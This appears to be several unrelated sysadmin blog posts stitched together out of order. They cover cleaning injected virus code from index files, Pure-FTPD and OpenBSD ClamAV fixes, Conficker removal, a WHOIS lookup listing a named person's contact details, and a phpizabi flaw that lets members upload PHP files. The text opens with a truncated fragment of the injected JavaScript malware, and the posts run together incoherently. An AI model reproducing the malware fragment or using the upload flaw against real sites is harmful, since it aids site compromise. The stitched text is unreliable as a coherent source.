var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();

The condition , all index file , index.html or index.php was injected. The virus code injected on last line of file. After couple hour browse I didn’t find any solution to this problem and this make me confused, it will horrible if I have to remove the virus code one by one.

After two hour doing experiment finally I found the way how to remove the virus, just use bash script , using “grep” , “find” , “cut” , “grep” , “xargs” and “sed”.

I just follow the instruction from howtoforge for Pure-FTPD with mysql support. Recently I realize that tutorial dedicated to buid a FTP with no have relation with httpd.

When I try to login to my ftp it can login well but the user will be “read-only” because the FTP home folder owner is apache user. For example my FTP user cacti with home user /var/www/html/cacti.

To accommodate my needs I need to adjust some parameter on pure-ftpd config ( /etc/pure-ftpd/pure-ftpd.conf ) , find “MinUID” string and set it to apache UID / for example on my server apache UID is 48 , now set MinUID to 48. Restart your Pure-FTPD server and test it ^^

Method that I use is :

1. Unplug / terminate the local area connection.

2. Use rootkit detector to disable some svchost service infected by conficker

You can download the rootkit detector at http://www.gmer.net/ Run the rootkit detector software, if your computer has conficker on it it will detect some svchost service in red colour. You not need do full scan, just right click on red svchost service found by the rootkitdetector, and click disable service.

3. Use conficker removal software

Use this removal software from http://www.enigmasoftware.com/products/conficker-removal-tool/ it very small tool, less than 200Kb software. Download and run the software. Follow the instruction. It need reboot few time.

4. Patch Your Windows with latest hotfix from microsoft to avoid conficker come again. Get the patch on

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx . Download accourding you operating system.

That’s it

On “Makefile”, remove “>” on LIB_DEPENDS section, so it will be like this

LIB_DEPENDS= gmp.6::devel/gmp \
bz2.10::archivers/bzip2 \
iconv.4::converters/libiconv

On “pkg/PLIST”, remove “@bin” and also “@sbin”, and then add “share” to “manual” path, the “manual” path will be like this

share/man/man1/clamconf.1
share/man/man1/clamdscan.1
share/man/man1/clamscan.1
share/man/man1/freshclam.1
share/man/man1/sigtool.1
share/man/man5/clamd.conf.5
share/man/man5/freshclam.conf.5
share/man/man8/clamav-milter.8
share/man/man8/clamd.8

If you finish with “make”, use “make update” on ClamAV ports to update your installed ClamAV

New version of ClamAV need “/dev/null”, so if you run ClamAV in chroot like I did, you need make /dev/null in our chroot path. For example, my chroot path for CLamAV is /var/clamav. Usually /var mounted with “nodev” so we must remove “nodev” mount option.

#mount -o dev -u /dev/wd0e
#mount
/dev/wd0a on / type ffs (local)
/dev/wd0d on /home type ffs (local, nodev, nosuid)
/dev/wd0e on /var type ffs (local, nosuid)

#mkdir /var/clamav/dev
#mknod /var/clamav/dev/null c 2 2

Make new “dev/null” belong to user that run ClamAV chroot, I use “_clamav” as my chroot user.

#chown _clamav:_clamav /var/clamav/dev/null

Just Like That … and don’t forget to update the virus database

From the google I found that the WordPress that I use is buggy , some one has reset my admin password ….. so I decide to upgrade my WordPress to 2.6.3 I hope it will better now.

This day, when I check my Word press comment I found some one has give me spam comment, for this post http://a3-system.info/blog/daily-life/webzworks-was-cheating/ I know it’s human not comment bot because my WordPress using captcha for comment spam protection,

This spam comment came from IP : 121.120.226.180

inetnum: 121.120.0.0 – 121.123.255.255
netname: MAXISNET
descr: Maxis Communications Bhd
country: MY
admin-c: ST430-AP
tech-c: MO113-AP
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation’s account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
mnt-by: APNIC-HM
mnt-lower: MAINT-MY-MAXIS
changed: hm-changed@apnic.net 20070227
source: APNIC

person: See Heng Tan
nic-hdl: ST430-AP
e-mail: stansee@maxis.com.my
address: Plot 12155 (Lot13)
address: Jalan Delima 1/1
address: Subang Hi-Tech Industrial Park
address: Shah Alam
address: Selangor Darul Ehsan
address: Malaysia
phone: +603-5880-1636
fax-no: +603-5880-0228
country: MY
changed: stansee@maxis.com.my 20070124
mnt-by: MAINT-MY-MAXIS
source: APNIC

person: Maxis Network and Security Operations
nic-hdl: MO113-AP
e-mail: hostmasters@maxis.com.my
address: Level 19, Menara Maxis,
address: KLCC, 50088 Kuala Lumpur
address: Malaysia
phone: +603-2330-7500
fax-no: +603-2330-0587
country: MY
changed: stansee@maxis.com.my 20070122
mnt-by: MAINT-MY-MAXIS
source: APNIC

This malaysian people again ? I have forget what you have done to me, but why you starting again ??

# cd /usr
# export CVSROOT=anoncvs@anoncvs.ca.openbsd.org:/cvs
# cvs -q get -P ports/security/clamav/

After update my ClamAV source was updated from version 0.92.1 to 0.94, then ready to ‘make’ and ‘make install’

# cd /usr/ports/security/clamav
# make
# make install

Some thing wrong when on “make install”, this error nearly same as I found when I porting postfix, but when in postfix I prefer to use old version rather using new one because It was late and I was so tired :p It say “unknown element @bin/” when I do make install.

So what kind of this error, I have no clue about this, googling didn’t give good result because you know it’s OpenBSD . Then I try to compile older ClamAV that came from ports, the version is 0.92.1. The result is, everything was smooth, normal porting process, so I guest the problem was in port update.

I decide to review the ports code, compare the updated version and the original version of clamav ports, Comparing this file /usr/ports/security/clamav/pkg/PLIST and I found this :

clamav-0.92.1

@comment $OpenBSD: PLIST,v 1.9 2008/01/02 18:10:51 bernd Exp $
@newgroup _clamav:539
@newuser _clamav:539:539:daemon:Clam AntiVirus:/nonexistent:/sbin/nologin
bin/clamav-config
bin/clamconf
bin/clamdscan
bin/clamscan
bin/freshclam
bin/sigtool

clamav-0.94

@comment $OpenBSD: PLIST,v 1.11 2008/07/08 22:38:12 sthen Exp $
@newgroup _clamav:539
@newuser _clamav:539:539:daemon:Clam AntiVirus:/nonexistent:/sbin/nologin
bin/clamav-config
@bin bin/clamconf
@bin bin/clamdscan
@bin bin/clamscan
@bin bin/freshclam
@bin bin/sigtool

Why there exist “@bin” ? so I remove all @bin, save this file, and doing ‘make’ and ‘make install’ again. The result : ClamAV 0.94 successfully installed What a weird

In the picture directory, I saw a .php file, curious why a .php file located here, then I view the source code and I know a bad situation happen, the .php file is remote file explorer, seem some one has put it here and absolutely he can delete all file he want, include the all picture member of this site. The phpizabi is compromised, have a vulnerability so anyone can put some .php file here.

After searching in google I found that this application have vulnerability in “create event” menu. A registered member of this website can make some “event” and in this event, the user can upload a photo of the event. Normally it should be a image file can be .bmp .jpg .png .gif unfortunately the developer of phpizabi forget to filter the file extension, so a registered member can upload a php file then anyone can access it directly, I have test it for prove of concept and it’s work even I have update phpizabi with their hot fix (newer index.php).

My suggestion, add a file extension filter process on event picture upload or disable the picture event.